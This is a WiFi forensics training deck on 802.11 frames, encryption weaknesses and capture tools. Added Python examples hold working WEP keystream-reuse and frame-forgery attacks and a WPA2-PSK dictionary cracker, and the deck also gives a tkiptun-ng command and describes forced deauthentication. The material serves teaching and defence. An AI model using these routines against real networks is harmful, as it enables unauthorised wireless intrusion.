WiFi Networks Forensics Overview
Mike Davis, EE/MSEE, CISSP, SysEngr (ISSA/TSN/SOeC/AFCEA/NDIA/IEEE/INCOSE et al.)
Glenn G Jacobs, BSEE, Security+, Creative Commerce LLC
Presentation Overview
Why Wireless Networks?
What is Wireless Internet (Wi-Fi)?
WiFi Implementation
WiFi Threat Landscape
WiFi Basic Security Measures
WiFi Tools
WiFi Network Discovery
WiFi Packet Sniffing Example
WiFi WEP Password Cracking Example
Web Links
5/23/2013 Copyright 2013 Creative Commerce LLC
Why Wireless Networks?
CONVENIENCE OF INSTALLATION! Adding a Wireless Access Point (WAP) to an existing router is straightforward, and wireless security has frequently just been taken for granted.
CONVENIENCE OF MOBILITY! Businesses with less than $10 million in annual revenue are leading the charge, with 83 percent either using or planning to use Wi-Fi; 76 percent of the workforce will be using a mobile networking device (laptops, PDAs, etc.) (source: workforce.html).
Connectivity is now as convenient as the local coffee shop.
What is Wireless Internet (Wi-Fi)?
Definition: a 2.4 GHz / 5 GHz radio-frequency data communication architecture and associated protocols based upon the IEEE 802.11 family of standards. A key concept is that WiFi stations exchange data frames using the MAC (Media Access Control) and Logical Link Control (LLC) sublayers of the OSI Data Link Layer, with the RF LAN card handling the PHY (Physical) layer.
WiFi Implementation: Frequency Assignment (2.4 GHz shown, 802.11b/g/n)
NOTE: the signal must be attenuated by at least 30 dB from its peak energy at ±11 MHz from the centre frequency, which is the sense in which 2.4 GHz channels are effectively 22 MHz wide. Because the channel centres are only 5 MHz apart, one consequence is that stations can only use every fourth or fifth channel without overlap, typically 1, 6 and 11 in the Americas (centre frequencies 2412, 2437 and 2462 MHz).
WiFi Implementation: Channels 1-7 Frequency Assignment (2.4 GHz, 802.11g)
Note: the above frequencies are all permitted in the US. Not all WiFi channels are legal in all nations (channel 14, for example, is permitted only in Japan and only for 802.11b).
WiFi Implementation: Channels 8-13 Frequency Assignment (2.4 GHz, 802.11b/g/n)
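The channel arithmetic behind the three frequency-assignment slides, as an added example that is not part of the original deck: centre frequencies for the 2.4 GHz and 5 GHz channels, the 22 MHz overlap rule, and which access points in a (constructed) site survey interfere with a chosen channel. The survey SSIDs are made up for the example.

```python
# Added example (not from the slides): 802.11 channel centre frequencies and
# the 22 MHz overlap rule for the 2.4 GHz band.

def channel_center_mhz(channel: int) -> int:
    """Centre frequency in MHz. 2.4 GHz band: channels 1-14; 5 GHz band: 36-165."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel          # channel 1 = 2412, 6 = 2437, 11 = 2462
    if channel == 14:
        return 2484                        # Japan only, 802.11b
    if 36 <= channel <= 165:
        return 5000 + 5 * channel          # channel 36 = 5180, 40 = 5200, ...
    raise ValueError(f"unknown 802.11 channel {channel}")


def channels_overlap(a: int, b: int, width_mhz: int = 22) -> bool:
    """True if the two channels' occupied bandwidth overlaps.
    Legacy 2.4 GHz channels are treated as 22 MHz wide (the -30 dB at +/-11 MHz
    rule from the slide); 5 GHz 802.11a/n channels are 20 MHz wide."""
    return abs(channel_center_mhz(a) - channel_center_mhz(b)) < width_mhz


def non_overlapping_channels(channels, width_mhz: int = 22) -> list:
    """Greedy pick of mutually non-overlapping channels, lowest first."""
    chosen = []
    for ch in sorted(channels):
        if all(not channels_overlap(ch, c, width_mhz) for c in chosen):
            chosen.append(ch)
    return chosen


def interfering_aps(scan, channel: int, width_mhz: int = 22) -> list:
    """Given a site survey [(ssid, channel), ...], list the APs whose channel
    overlaps `channel`: the co-channel and adjacent-channel interferers that a
    discovery tool's channel-use chart would show."""
    return [ssid for ssid, ch in scan if channels_overlap(ch, channel, width_mhz)]


if __name__ == "__main__":
    # Constructed survey for the example, not real scan data
    survey = [("linksys", 6), ("2WIRE351", 11), ("bulliron", 1), ("cafe", 9)]
    print(non_overlapping_channels(range(1, 14)))   # [1, 6, 11]
    print(interfering_aps(survey, 6))               # ['linksys', 'cafe']
```

The greedy pick reproduces the 1/6/11 plan from the slide; note that a 5 GHz pair such as 36 and 40 does not overlap at 20 MHz width, which is why the 5 GHz band is so much less crowded.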
WiFi Implementation: 802.11 "g" Standard
Up to 54 Mbit/s data rate
Data rate falls back to as low as 1 Mbit/s at the edge of range (about 300 feet)
Orthogonal Frequency-Division Multiplexing (OFDM), falling back to Direct Sequence Spread Spectrum (DSSS) for the 802.11b rates
Typical range of 300 feet, well past the walls of the building: a hacker's dream
Most "g" hardware is backward compatible with 802.11b (same 2.4 GHz band); dual-band a/b/g cards also support 802.11a at 5 GHz
802.11g was the most popular WLAN choice for new installations until 802.11n arrived in 2009
WiFi Implementation: 802.11 "n" Standard (2009)
Multi-stream 2.4 GHz / 5 GHz architecture
Up to 150 Mbit/s single stream, 300 Mbit/s dual stream, 450 Mbit/s three streams (40 MHz channels, short guard interval)
20 MHz or 40 MHz channel width (a 40 MHz channel bonds two adjacent 20 MHz channels)
Multiple-Input / Multiple-Output (MIMO) spatial multiplexing
WiFi Implementation: 802.11 "ac" 5 GHz Standard (2013)
Multi-stream, 5 GHz only architecture; backward compatible with 802.11n equipment on 5 GHz
Up to about 433 Mbit/s single stream, 867 Mbit/s dual stream, 1.3 Gbit/s three streams (80 MHz channels, 256-QAM)
Up to 80 MHz channel width (160 MHz optional)
Multiple-Input / Multiple-Output (MIMO) spatial multiplexing, with multi-user MIMO added
WiFi Implementation: "Infrastructure Mode" Concept
An Ethernet router is cabled to a Wireless Access Point (WAP), which radiates WiFi.
WiFi Implementation: WiFi Home "Infrastructure Mode" Target
A home wireless Ethernet router is cabled to the Internet modem and radiates WiFi.
WiFi Implementation: Terminology
BSS: Basic Service Set: the WiFi infrastructure concept; a router or Wireless Access Point (WAP) transmitter together with the stations that communicate with it.
BSSID: the MAC (Media Access Control) address of the router or WAP radio; it uniquely identifies the BSS.
SSID: Service Set Identifier: the broadcast network name that each user specifies to join a given WiFi network. It is carried in beacons in the clear and is not a secret, so treat it as a label rather than as a "username".
Management frames: frames that broadcast the router's SSID (beacons), carry user probe requests and responses, association/disassociation, and authentication/deauthentication.
WiFi Implementation: 802.11 Frame Standards
The 802.11 standard defines frame types for the transmission of data as well as for management and control of wireless links. Frames are divided into specific, standardized sections: each frame has a MAC header, a payload (frame body) and a Frame Check Sequence (FCS); some frames have no payload. The first 2 bytes of the MAC header are the Frame Control field, whose subfields are, in order:
Protocol Version: 2 bits. The version currently in use is zero; other values are reserved for future use.
Type: 2 bits, identifying the class of frame: Management (0), Control (1) or Data (2).
Sub Type: 4 bits. Type and Sub Type together identify the exact frame.
ToDS and FromDS: 1 bit each, indicating whether a data frame is headed to or from the distribution system (the wired side behind the access point). Control and management frames set both to zero. Data frames have one of them set (to the AP, or from the AP), both set for bridged/WDS traffic, and both zero within an IBSS (ad hoc) network.
More Fragments: set when a higher-level packet has been fragmented, on every fragment except the last. Some management frames may be fragmented as well.
Retry: set to one when a frame is retransmitted, so that receivers can discard duplicates.
Power Management: indicates the power-management state the sender will be in after the frame exchange completes. Access points manage the connection and never set this bit.
WiFi Implementation: 802.11 Frame Standards (cont'd)
More Data: used by the access point to tell a station in power-save mode that at least one more buffered frame is waiting for it.
Protected Frame (formerly the "WEP" bit): set to one when the frame body is encrypted (WEP, TKIP or CCMP). A sniffer uses it to tell ciphertext bodies from cleartext ones.
Order: set only when the "strictly ordered" delivery class is used; frames and fragments are not otherwise guaranteed to arrive in order, because enforcing order costs throughput.
The next two bytes are the Duration/ID field, which takes one of three forms: Duration (medium reservation), Contention-Free Period (CFP), or Association ID (AID).
A frame can have up to four address fields, each carrying a MAC address. Address 1 is the receiver, Address 2 the transmitter, Address 3 is used by the receiver for filtering (typically the BSSID or the original source/destination), and Address 4 appears only in data frames with both ToDS and FromDS set.
The Sequence Control field is two bytes used to identify message order and eliminate duplicate frames: the low 4 bits are the fragment number and the high 12 bits the sequence number.
An optional two-byte Quality of Service control field was added with 802.11e.
The Frame Body is variable in size, from 0 to 2304 bytes plus any overhead from security encapsulation, and carries the higher-layer data.
The Frame Check Sequence (FCS) is the last four bytes of the frame: a CRC-32 over the header and body. The sender computes and appends it; the receiver recomputes it and, if the values match, assumes the frame was not corrupted in transit. The FCS detects noise, not tampering: it is not a cryptographic integrity check.
WiFi Implementation: 802.11 Frame Standards (cont'd)
Management frames allow for the maintenance of communication. Some common subtypes:
Authentication frame: authentication begins with the Wireless Network Interface Card (WNIC) sending an authentication frame to the access point containing its identity. With open-system authentication the WNIC sends a single authentication frame and the access point responds with an authentication frame of its own indicating acceptance or rejection. With shared-key (WEP) authentication, after the WNIC sends its initial request it receives an authentication frame from the access point containing challenge text; the WNIC returns an authentication frame containing the encrypted challenge, and the access point checks that it was encrypted with the correct key. Note that this exchange exposes both the plaintext challenge and its RC4-encrypted form to anyone listening, which leaks keystream; shared-key authentication is therefore weaker, not stronger, than open-system authentication with WEP.
Association request frame: sent from a station; it lets the access point allocate resources and synchronize. The frame carries information about the WNIC, including supported data rates and the Service Set Identifier (SSID) of the network the station wishes to join. If the request is accepted, the access point reserves memory and establishes an association ID for the WNIC.
Association response frame: sent from an access point to a station with the acceptance or rejection of an association request. On acceptance the frame contains information such as the association ID and supported data rates.
Beacon frame: sent periodically by an access point to announce its presence and provide the SSID and other parameters to WNICs within range.
Deauthentication frame: sent by a station or access point to terminate an authenticated relationship.
Disassociation frame: sent by a station (or access point) wishing to end the association; an orderly way to let the access point release its memory allocation and remove the WNIC from the association table.
Neither deauthentication nor disassociation frames are authenticated unless 802.11w Protected Management Frames is in use, so anyone in radio range can forge them on behalf of a station or access point; this is the basis of the deauthentication attack used to force clients to reconnect (and to replay the handshake).
Probe request frame: sent by a station to solicit information (SSID, capabilities) from access points, either broadcast or for a specific SSID.
WiFi Implementation: 802.11 Frame Standards (cont'd)
Probe response frame: sent by an access point after receiving a probe request; contains capability information, supported data rates, etc.
Reassociation request frame: a WNIC sends a reassociation request when it drops out of range of its current access point and finds another access point with a stronger signal. The new access point coordinates forwarding of any information still buffered at the previous access point.
Reassociation response frame: sent by an access point with the acceptance or rejection of a reassociation request. It includes the information required for association, such as the association ID and supported data rates.
Control frames facilitate the exchange of data frames between stations. Some common control frames:
Acknowledgement (ACK) frame: after receiving a data frame without errors, the receiving station sends an ACK to the sender. If the sender does not receive an ACK within a predetermined time, it retransmits the frame.
Request to Send (RTS) frame: RTS and CTS provide an optional collision-reduction scheme for access points with hidden stations. A station sends an RTS as the first step of a two-way handshake before sending data frames.
Clear to Send (CTS) frame: a station responds to an RTS with a CTS, granting the requester clearance to send a data frame. The CTS carries a time value during which all other stations must hold off transmitting while the requesting station transmits.
Data frames carry packets from web pages, files, etc. within the body.
WiFi Implementation: WEP Encryption
Wired Equivalent Privacy (WEP): the older standard. 64-bit WEP uses a 40-bit key, which is concatenated with a 24-bit initialization vector (IV), SENT IN CLEAR TEXT in every frame, to form the per-packet RC4 key. All of the major manufacturers now implement an extended 128-bit WEP using a 104-bit key (WEP-104).
The 24-bit IV space repeats quickly on a busy network (keystream reuse), and the integrity check is a plain CRC-32, which is linear and can be fixed up after flipping bits in the ciphertext. WEP is therefore broken by tools such as aircrack-ng regardless of key length.
DO NOT USE WEP EXCEPT FOR TRAINING/DEMONSTRATION
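The two structural WEP weaknesses named above, as an added example that is not part of the original deck: an RC4 implementation and the WEP body format (IV, key ID, RC4-encrypted plaintext plus CRC-32 ICV), then keystream reuse when an IV repeats, and the bit-flipping attack that edits an encrypted frame while keeping the ICV valid. The 40-bit key `fujx9` is the one recovered later in these slides; the frame contents are constructed for the example.

```python
# Added example (not from the slides): WEP encryption/decryption and two of the
# attacks that follow directly from its design (IV reuse and CRC-32 linearity).
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: IV(3) | KeyID(1) | RC4_{IV||key}(plaintext || ICV). The IV is the
    only per-packet secret material and it travels in the clear."""
    assert len(iv) == 3 and len(key) in (5, 13)          # WEP-40 or WEP-104
    payload = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(payload, rc4(iv + key, len(payload)))


def wep_decrypt(key: bytes, body: bytes):
    """Returns (plaintext, icv_ok)."""
    iv, enc = body[:3], body[4:]
    payload = xor(enc, rc4(iv + key, len(enc)))
    plaintext, tag = payload[:-4], payload[-4:]
    return plaintext, tag == icv(plaintext)


def keystream_reuse(body1: bytes, body2: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so XORing the ciphertexts
    cancels it and yields plaintext1 XOR plaintext2, no key required."""
    assert body1[:3] == body2[:3], "attack needs the same IV"
    return xor(body1[4:], body2[4:])


def flip_bits(body: bytes, delta: bytes) -> bytes:
    """Turn an encrypted body for plaintext p into one for p XOR delta with a
    valid ICV, using CRC linearity: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(0...0)."""
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return body[:4] + xor(body[4:], delta + icv_delta)


if __name__ == "__main__":
    key, iv = b"fujx9", b"\x01\x02\x03"                   # constructed IV; key from the cracking slides
    p1, p2 = b"GET /a HTTP/1.0", b"GET /b HTTP/1.0"       # constructed plaintexts
    b1, b2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    print(wep_decrypt(key, b1))
    print(xor(keystream_reuse(b1, b2), p1)[:len(p2)])     # p2 recovered from p1 alone
    print(wep_decrypt(key, flip_bits(b1, xor(p1, p2))))   # (p2, True): forged frame passes the ICV
```

Neither attack needs the key: IV reuse needs only one known plaintext (DHCP and ARP are full of known bytes, as a later slide notes), and the ICV fix-up works because CRC-32 is affine over XOR. Both are why WEP is broken by design rather than merely weak.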
WiFi Implementation: WPA Encryption
WiFi Protected Access (WPA) with the Temporal Key Integrity Protocol (TKIP): implements a key-mixing function that combines the secret root key with the initialization vector (and the transmitter address) before passing the result to the RC4 initialization. WEP, in comparison, merely concatenated the IV to the root key and passed that value to RC4, which is what permitted the vast majority of the RC4-based WEP key attacks.
WPA implements a sequence counter (TSC) to protect against replay attacks: packets arriving with a TSC at or below the last one seen are rejected by the receiver.
TKIP implements a 64-bit message integrity check (MIC) named "Michael".
Still vulnerable to packages such as tkiptun-ng (the Beck-Tews attack), which recovers the Michael MIC key and decrypts short packets such as ARP; it does not recover the network passphrase. Prefer WPA2 with AES/CCMP.
WiFi Implementation: WPA Encryption (cont'd)
Tkiptun MIC Retrieval
Usage: tkiptun-ng <options> <replay interface>
Filter options:
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-F : choose first matching packet
-e essid : set target AP SSID
WiFi Implementation: WPA Encryption (cont'd)
Tkiptun MIC Key Retrieval
Usage: tkiptun-ng <options> <replay interface>
Debug options:
-K prga : keystream for continuation
-y file : keystream-file for continuation
-j : inject FromDS packets
-P pmk : pmk for verification/vuln testing
-p psk : psk to calculate pmk with essid
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
--help : Displays this usage screen
WiFi Implementation: WPA Encryption (cont'd)
Tkiptun MIC Key Retrieval Example
Input: tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
Output (abridged):
The interface MAC (00:0E:2E:C5:81:D3) doesn't match the specified MAC ... so an Address Resolution Protocol (ARP) reply is forced ...
ARP Reply Checking x.y
15:54:11 Reversed MIC Key : C3:95:10:04:8F:8D:6C:66
Here -h is the MAC of a client already associated with the AP (the tool spoofs it as source) and -a is the target BSSID; -m/-n bound the packet length so that a short ARP frame is selected. The recovered value is the 64-bit Michael MIC key for the AP-to-client direction, not the network passphrase.
WiFi Implementation: WPA2 Encryption
WiFi Protected Access 2 (WPA2): CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) replaces TKIP.
1. The Advanced Encryption Standard (AES) is the cipher: 128-bit key, 128-bit block, 10 rounds, per FIPS-197.
2. Confidentiality and message integrity are handled by a single AES-based component (CCM mode: counter mode for encryption, CBC-MAC for the MIC). The per-session keys themselves are derived from the Pairwise Master Key by the 4-way handshake.
3. A CCMP MAC Protocol Data Unit (MPDU) comprises five sections: MAC header, CCMP header (packet number and key ID, in the clear), data unit, message integrity code (MIC), and frame check sequence (FCS). Of these, only the data unit and MIC are encrypted.
WPA2 is not subject to the WEP/TKIP cipher attacks, but WPA2-Personal (PSK) is vulnerable to an offline dictionary or brute-force attack on the passphrase once an attacker has captured the 4-way handshake (which a deauthentication can force at will). The strength of the network is the strength of the passphrase.
WiFi Implementation: Enterprise-Grade Encryption
Enterprise-grade WPA/WPA2 (WPA-Enterprise): IEEE 802.1X port-based authentication backed by a Remote Authentication Dial-In User Service (RADIUS) server. The wireless access point acts as the 802.1X authenticator and relays EAP messages between the client (supplicant) and the RADIUS server; the session key is delivered to the access point only after the user authenticates, so there is no shared passphrase to crack.
A typical challenge/response method (for example MS-CHAPv2 inside PEAP) works as follows. When a user logs on, the network access server (NAS), wireless access point or authentication server creates a "challenge", typically a random number, and sends it to the client machine. The client software uses its password or a secret key to transform the challenge with an encryption algorithm or one-way hash function and sends the result back to the network (the "response"). The authentication system performs the same cryptographic operation on the challenge and compares its result to the client's response. If they match, the authentication system has verified that the user has the correct password.
Caveat: the client must validate the RADIUS server's certificate. Otherwise an attacker running a rogue access point and RADIUS server can collect challenge/response pairs and attack the password offline.
WiFi Threat Landscape: Hacker's Goals: Penetrate / Elevate / Manipulate
PENETRATION: the hacker gains access to the system under attack.
ELEVATION: the hacker increases their privilege level by abusing system services.
MANIPULATION: the hacker directs the victim's system to do his bidding.
WiFi Threat Landscape
DHCP contains large amounts of known plaintext (useful for known-plaintext attacks on WEP)
Rogue Wireless Access Points
Hostile wandering clients
Ad hoc (peer-to-peer) "Free Public WiFi" hostile networks
Denial of Service attacks
Survey figures:
57 percent of IT managers are not confident that their organization knows the state of every endpoint that connects to their network.
More than 50 percent of companies are using shared passwords or no encryption at all on Wi-Fi access points.
Only 29 percent of companies check that computers are up to date and patched before allowing traveling or remote employees to access the network when they return to the office.
More than 50 percent of companies surveyed have guests accessing the network every day, with 20 percent allowing non-employees to plug directly into the network without security checks or controls.
31 percent of companies do not know the identity of every user on their network.
WiFi Threat Landscape: WiFi Intrusion at TJX (TJ Maxx): Vulnerability to a Hostile Client
A store WiFi network with inadequate WEP encryption had replaced retail outlet cabling at kiosks in Minnesota. Attackers in the parking lot captured traffic, recovered the WEP key, and used that foothold to reach the company's central payment systems.
WiFi Basic Security Measures: Change Admin Password Settings
Change the wireless router / Wireless Access Point (WAP) administrative username and password from the industry defaults (typically Username: admin, Password: admin, or a blank password). Default credentials are published for every model. Where the device allows it, also disable administration over the wireless interface so that only a cabled client can reach the admin page.
WiFi Basic Security Measures: Change Encryption Settings
DO NOT USE Wired Equivalent Privacy (WEP) encryption: its keys can be broken in minutes (under a minute on a busy network).
Use stronger encryption: WPA2 with AES/CCMP. WPA-PSK / WPA2-PSK (WiFi Protected Access, Pre-Shared Key) uses a single pre-shared key for key management. The key can be entered either as 64 hexadecimal digits (the raw 256-bit PSK) or as an 8 to 63 character passphrase, from which the PSK is derived by hashing the passphrase together with the SSID.
Because the 4-way handshake can be captured and checked offline, the passphrase must be long and random: a dictionary word, a phone number or a short phrase will be recovered by aircrack-ng, no matter that the cipher is AES.
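The derivation chain that makes the offline attack mentioned here (and on the WPA2 slide) possible, as an added example that is not part of the original deck: passphrase and SSID to PMK with PBKDF2, PMK plus both MACs and both handshake nonces to PTK with the 802.11i PRF, and the KCK to the EAPOL-Key MIC; a small dictionary attack then checks candidate passphrases against a captured message 2. The SSID/passphrase pair "IEEE"/"password" is the IEEE 802.11i test vector; the MAC addresses, nonces, EAPOL frame and wordlist are constructed for the example.

```python
# Added example (not from the slides): WPA2-PSK key derivation and the offline
# dictionary attack against a captured 4-way handshake.
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why rainbow tables are per-SSID (and why 'linksys' is a bad SSID)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP: KCK | KEK | TK) from the PMK, both MACs and both nonces.
    Everything except the PMK is visible in the first two handshake messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL-Key frame with
    its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zero_mic, observed_mic, wordlist):
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per candidate, no further
    radio contact needed. The cipher never enters into it; only the passphrase does."""
    for cand in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zero_mic), observed_mic):
            return cand
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 of 4 (descriptor type 2, key info 0x010a,
    MIC field zeroed for MIC computation, RSN IE for CCMP/PSK in key data)."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02" + struct.pack("!HHQ", 0x010A, 16, 1) + snonce + bytes(16) + bytes(8)
            + bytes(8) + mic + struct.pack("!H", len(rsn_ie)) + rsn_ie)
    return b"\x01\x03" + struct.pack("!H", len(body)) + body


# Constructed handshake parameters (not from a real capture)
SSID, TRUE_PASSPHRASE = "IEEE", "password"          # 802.11i Annex test-vector pair
AA = bytes.fromhex("00146c7e4080")                   # access point MAC (authenticator)
SPA = bytes.fromhex("000fb5abcb9d")                  # station MAC (supplicant)
ANONCE = bytes(range(32))                            # from message 1 (AP -> station)
SNONCE = bytes(range(32, 64))                        # from message 2 (station -> AP)


def capture_and_crack(wordlist):
    """Simulate the station computing the message 2 MIC with the real passphrase,
    then an attacker who sniffed messages 1 and 2 running the wordlist."""
    kck = ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    zeroed = build_eapol_msg2(SNONCE)
    observed = eapol_mic(kck, zeroed)
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, zeroed, observed, wordlist)


if __name__ == "__main__":
    print(pmk_from_passphrase(SSID, TRUE_PASSPHRASE).hex())
    print(capture_and_crack(["letmein", "wifi1234", "password", "hunter2"]))   # 'password'
```

The 4096 PBKDF2 iterations are the only thing slowing the attacker down, and GPUs make that cheap; the defence is entropy in the passphrase (or WPA-Enterprise, where there is no shared secret to capture).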
WiFi Tools: SUMMARY
Handheld directional RF WiFi detector, with spare CR2032 lithium coin-cell batteries
Windows, Linux or Mac OS laptop with spare, fully charged battery packs
Wireless LAN WiFi PC "interface" adapter (card/USB) that supports "Monitor Mode": super critical!
WiFi forensics software for network discovery, packet capture and analysis
120 V electrical power / automotive adapter
Paper forms and logs
WiFi Tools: Handheld Directional RF Detector
Hawking Technology Model HWL1 b/g WiFi Locator
Network specification: IEEE 802.11b/g
Operating frequency: 2.4 GHz band
Operating range: up to 1000 feet (line of sight), up to 300 feet (indoors)
LEDs: 1 x Power, 5 x Signal Strength
Antenna gain: dBi (value not given on the slide)
Battery: 1 x lithium CR2032, 2-year battery life
Dimensions: 92 (L) x 56 (W) x 25 (H) mm; weight 45 g
tlist.php?CatID=32&FamID=71&ProdID=131
Hawking Technology Model HWL1 functionality: point the directional antenna towards the source and press the "Locate" button. The signal filters on the Model HWL1 filter out unwanted 2.4 GHz signals such as Bluetooth, cordless phones and microwaves.
WiFi Tools: Windows vs. Linux vs. Mac OS Laptop Selection Criteria
User comfort and familiarity will affect the OS choice.
Microsoft Windows, whose NDIS driver model exposes monitor mode only through special hardware such as the AirPcap adapter, has fewer WiFi forensics hardware/software combinations and fewer "monitor mode" wireless card / password-cracking software pairings than Linux, although there have been recent additions.
Linux has a large number of historically prominent WiFi forensics packages. The majority are still command-line tools and may require time for familiarization. More recently, "Windows-like" graphical Linux WiFi forensics software has become available, often as part of free forensics distributions such as BackTrack 4 (whose successor is Kali Linux).
Mac OS is supported by the popular multifunction KisMAC WiFi "stumbler" (network discovery) / packet sniffing / password cracking software, which is geared toward network security professionals. The Apple AirPort WiFi card is also supported by Linux.
WiFi Tools: Wireless LAN WiFi PC Adapter (Card/USB) that Supports "Monitor Mode"
"Ordinary" laptop WiFi access (coffee-shop web surfing, etc.) involves the WiFi adapter running in so-called "managed mode", the default for every laptop as purchased. In managed mode the laptop's wireless adapter and its software depend entirely on the infrastructure's wireless router for connectivity, and the adapter only passes up frames addressed to it. Usernames and passwords are seldom required at coffee shops and other public places.
Managed mode is useless for WiFi packet-sniffing forensic activities. Some Windows "stumbler" (WiFi network discovery/enumeration) programs can function, partially, with adapters in managed mode; one of these is "Wireless Mon" by PassMark.
The forensic laptop's WiFi card must be placed in "Monitor" mode, in which the card passes up every 802.11 frame it hears, including management and control frames, without associating to any network.
Popular laptop WiFi chipsets such as Broadcom often do not support monitor mode. Chipsets by Hermes, Prism2, Spectrum24, Raylink, Zydas and Atheros are supported by most forensics software. Packet injection (needed for aireplay-ng style attacks) is a separate capability; check the driver's support for both before buying.
WiFi Tools: Linux WiFi Card Setup
The forensic laptop's WiFi card must be placed in "Monitor Mode". To accomplish this, as the Linux root user, do the following on the command line:
1. iwconfig <enter>
Note the Mode:Managed (vs. Mode:Monitor) in the response for the wireless interface, and note the interface name it reports.
2. To REQUEST the change to Monitor mode: iwconfig wlan0 mode monitor <enter>
(Note: substitute the name from step 1. The slides used "eth01" as an example; depending on the driver the wireless interface may be wlan0, eth1, or ath0 if your chipset is Atheros under the madwifi driver. Many drivers require the interface to be down before the mode changes: ifconfig wlan0 down first.)
WiFi Tools: Linux WiFi Card Setup (cont'd)
3. To ACTIVATE the change to Monitor mode: ifconfig wlan0 up <enter>
4. To CONFIRM activation of Monitor mode: iwconfig wlan0 <enter>. The response must now show Mode:Monitor. (The "UP BROADCAST MULTICAST" flags printed by ifconfig do not indicate monitor mode; they appear in managed mode as well.)
If your WiFi chipset is Atheros under the madwifi driver, use the following commands instead:
3. "Destroy" the managed-mode virtual interface: wlanconfig ath0 destroy <enter>
4. REQUEST the change to Monitor mode: wlanconfig ath0 create wlandev wifi0 wlanmode monitor <enter>
5. ACTIVATE the change to Monitor mode: ifconfig ath0 up <enter>
6. CONFIRM activation of Monitor mode: iwconfig ath0 <enter>, and check for Mode:Monitor.
On current kernels (mac80211 drivers) the equivalent is: ip link set wlan0 down; iw dev wlan0 set type monitor; ip link set wlan0 up. The aircrack-ng suite wraps the same steps as airmon-ng start wlan0, which also lists processes (such as NetworkManager) that may interfere with the capture.
WiFi Tools: Software Concepts
Network Discovery and Enumeration: most packet capture software also performs network discovery and enumeration.
"Wireless Mon" (Windows): runs in managed mode.
Kismet (Linux; included on the BackTrack 4 distribution).
Packet capture "engines": WinPcap (Windows), libpcap (Linux library).
Packet "sniffing" (retrieval/display), analysis and reporting: Wireshark (Windows and Linux); tcpdump (Linux), the oldest and most widely used network sniffer; WinDump (Windows 95 through Windows XP).
WiFi Tools: Packet Capturing Software
Packet capture (PCAP) libraries provide the data stream input for WiFi "sniffer"/analysis software.
The WiFi radio signal is received by the hardware "interface" card (WNIC) and handed to the PCAP library, which delivers the frames (and writes the .pcap file the examiner will keep as evidence).
PCAP software is often bundled with the distribution of the sniffer/analysis software: Windows users get "WinPcap"; Linux users get "libpcap".
WiFi Network Discovery: "Wireless Mon" WiFi "Managed Mode" Network "Drive-By" Discovery Software
"Wireless Mon" WiFi discovery software by PassMark runs in WiFi "Managed Mode" (!), a rarity. This means almost any off-the-shelf Windows "wireless laptop" can use, at least partially, the functionality of "Wireless Mon":
Detects and monitors wireless (WiFi) networks within range
Provides Service Set Identifier (SSID), system availability and encryption information
Presents a live channel-usage chart to help identify forensics targets
Generates signal-strength coverage maps (Professional Edition) by either manually plotting points or using a GPS device
WiFi Network Discovery: Windows "Wireless Mon" WiFi "Managed Mode" Example (screenshot)
WiFi Network Discovery: Windows "Wireless Mon" WiFi "Managed Mode" Discovery Example
Use the Summary tab to observe nearby WiFi "Channel Use".
